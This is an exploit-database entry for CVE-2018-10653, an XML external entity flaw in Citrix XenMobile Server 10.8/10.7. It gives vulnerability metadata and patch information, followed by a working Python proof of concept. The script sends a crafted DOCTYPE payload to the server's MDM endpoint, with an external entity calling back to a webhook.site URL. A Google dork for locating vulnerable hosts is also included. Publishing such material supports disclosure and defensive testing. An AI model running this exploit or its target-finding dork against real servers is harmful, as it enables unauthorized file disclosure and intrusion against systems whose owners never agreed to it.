Citrix XenMobile Server 10.8 - XML External Entity Injection

vendor:

XenMobile Server

by:

Jonas Lejon

9.8

CVSS

CRITICAL

XML External Entity Injection

611

CWE

Product Name: XenMobile Server

Affected Version From: XenMobile Server 10.8 before RP2 and 10.7 before RP3

Affected Version To:

Patch Exists: YES

Related CWE: CVE-2018-10653

CPE: a:citrix:xenmobile_server:10.8

Metasploit:

Other Scripts:

Platforms Tested: XenMobile

2019

Citrix XenMobile Server 10.8 – XML External Entity Injection

This exploit allows an attacker to inject XML external entities into the Citrix XenMobile Server, potentially leading to disclosure of internal files or denial of service attacks. The vulnerability exists in XenMobile Server 10.8 before RP2 and 10.7 before RP3. By sending a specially crafted XML payload, an attacker can exploit this vulnerability to trigger the XXE vulnerability and perform unauthorized actions.

Mitigation:

Citrix released a patch in May 2018 to address this vulnerability. Users are advised to update to XenMobile Server 10.8 RP2 or 10.7 RP3 or later versions to mitigate this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection
# Google Dork: inurl:zdm logon
# Date: 2019-11-28
# Exploit Author: Jonas Lejon
# Vendor Homepage: https://www.citrix.com
# Software Link:
# Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3
# Tested on: XenMobile
# CVE : CVE-2018-10653

#!/usr/bin/python3
##
## PoC exploit test for the security vulnerability CVE-2018-10653 in
XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28
<jonas.xenmobile@triop.se> https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##

import requests
import sys
from pprint import pprint
import uuid

# Surf to https://webhook.site and copy/paste the URL below. Used for
XXE callback
WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/"

id = str(uuid.uuid1())

xml = '''<?xml version="1.0" encoding="UTF-8"
standalone='no'?><!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "''' +
WEBHOOK + id + '''/test.dtd">%j00t9; ]>'''

print(id)

response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False,
 headers=
{'User-Agent': 'MDM/1.0',
'Connection': 'close',
'Content-Type': 'application/x-apple-aspen-mdm'},
data=xml,stream=True
)
print(response.content)
print(response.text)
pprint(response)